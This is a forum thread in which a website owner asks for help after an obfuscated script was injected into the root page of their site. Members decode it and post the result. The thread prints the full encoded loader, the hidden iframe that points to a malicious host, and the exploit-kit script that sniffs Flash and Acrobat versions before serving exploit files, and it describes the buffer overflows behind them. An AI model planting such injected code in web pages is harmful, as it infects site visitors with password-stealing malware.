Someone hacked my website!

h@ck3r

New Member
My forum is located here:

/forum

In the root of my domain, I only have an index.php file which is like a disclaimer, within only basic HTML (Enter/ Don't enter).

Problem is- the past few days.. members started reporting that their anti-virus etc was saying my website is a malicious site, and warning of a virus.

I use Nod32, and Avast on my PC's, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE

It would start using VERY HIGH memory resources, but seem to do nothing else.

After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:

PHP:
<?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'; ?>

Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host.

I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again.

I've also changed the index.php file for an index.html file.

I'm also worried that they have uploaded something else on my server too, and not just added this coding. Is there any way to scan the server for a virus? Is this something my host would need to do?

Can anyone give me any help with this as I need to make sure it doesn't happen again, and that I've totally got rid of it.

Can't believe this has happened, after only posting in this thread a couple of days ago!

Is there any way this code has been added to my index.php file because of this? As that's when it all started- as soon as I added dock in rock (I've removed it now).

Thanks for any help.
 

vForums

New Member
Thats base25 code your seeing a way to discise html i seen a exploit for 3.7.5 and up vbulletin ill try post it here to get members aware seems they injected it into your header somehow probably a shell contained in that code since it uses script codes..
 

mmmxiv

New Member
I use that dock in rock and I don't have that code. Beleive me, I checked.

Though I did edit it alot to my wishes.
 

h@ck3r

New Member
I cannot say 100% that it's down to Dock in Rock.. but for sure somehow this script has been injected to that index.php file, and I need to find out how this has been done :)
 

nagger

New Member
I looked into this a little bit.

That javascript blabla comes out to:

Code:
<iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

It opens an iframe to that dodgey site which then runs the script that contains 2 infected exploits, one being a .swf file and one being an .pdf

Code:
<script>
function mjnhyua() { return 'ra'+'m'; }
for(i=0;navigator.plugins[i];i++){
		regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
var ertdfg = "dfgdfgdfgdf43565gkui";
		result=regexp.exec(navigator.plugins[i]['description']);
ertdfg = "dfgdfgdfgdf43565gkui";
		if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
ertdfg = "dfgdfgdfgdf43565gkui";
			document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
ertdfg = "dfgdfgdfgdf43565gkui";
			break;
		}
}
for(i=0;navigator.plugins[i];i++){
		name=navigator.plugins[i].name;
		if(name.indexOf('Adobe Acrobat')!=-1){
			document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
			break;
		}
}
</script>

File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125
Specifically crafted SWF(flash files) files allow remote file execution when the client has a vulnerable FlashPlayer.A malformed SWF record's value triggers a buffer overflow. The size of the SWF files vary. Usually it's a download and execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of flashplayer up to 9.0.124.0 are vulnerable ( though we saw malicious pages trying to exploit only version 115 and 47).

Other file the pdf is This is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's Javascript engine in order to execute malicious code on user's computer. The exploitation mainly involves the following two functions:
util.printf() - if an attacker sends a string long enough to generate a
stack-based buffer overflow he will then be able to
execute arbitrary code on user's computer with the
same level privileges as the user who opened the PDF
file
Collab.colectEmailInfo() - a stack-based buffer overflow can be
caused by passing a string long enough (at least 44952
characters) as a parameter in the msg field of this
function.

The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult.
The javascript code inside the PDF file is used to download and execute other malware on user's computer.


I can conclude that the following people are vurnable to this exploit:
people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2
 

h@ck3r

New Member
Thanks for the above- Appreciated.

But After doing a boot scan with Avast (Nod32 never found anything), I deleted a LOT of stuff from my PC, and I thought it had gone.

But today the same error appeared again on my website. The code had somehow been injected to my index.html page.

:(
 

monoxera

New Member
I think you should try export / backup db, delete your FTP, install vb again, import using IMPEX.

Really, that's what I would do. Sorry if I didn't help. Just wanted to give my opinion :)
 

h@ck3r

New Member
monoxera said:
I think you should try export / backup db, delete your FTP, install vb again, import using IMPEX.

Really, that's what I would do. Sorry if I didn't help. Just wanted to give my opinion :)

Cheers bud but my VB is not hacked.

VB is in the /forum directory.

The file that has been hacked twice now is my own custom made index.html / index.php file that's in the root of my domain.

I've now removed this file, and setup a redirect in my .htaccess file.

Fingers crossed the /forum/index.php file doesn't get injected with this script now though.

Although I'm still trying to find out how I've been hacked in the first place.
 

vForums

New Member
Seems like a <script> code executed from a XSS Vuln in your site. Maybe /admincp/redirect=<script> etcetc
 

h@ck3r

New Member
vForums said:
Seems like a <script> code executed from a XSS Vuln in your site. Maybe /admincp/redirect=<script> etcetc

Sorry to sound dumb but could you explain that in simple terms (If poss) to me? :D

Are you saying that something I've installed (xss file) could be injecting this code?
 

bouncer

New Member
nagger said:
I can conclude that the following people are vurnable to this exploit:
people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2
Is there a solution, sorry to be obtuse.
 

h@ck3r

New Member
KrazyFire said:
if u have cpanel do an antivirus check -.-

I've got CPanelX- Is that what you mean?

I don't see any antivirus checker in there though.. should there be? :/

EDIT: This is the cpanel I have-

capture1-7.jpg


Cant see any virus checker though.
 
Top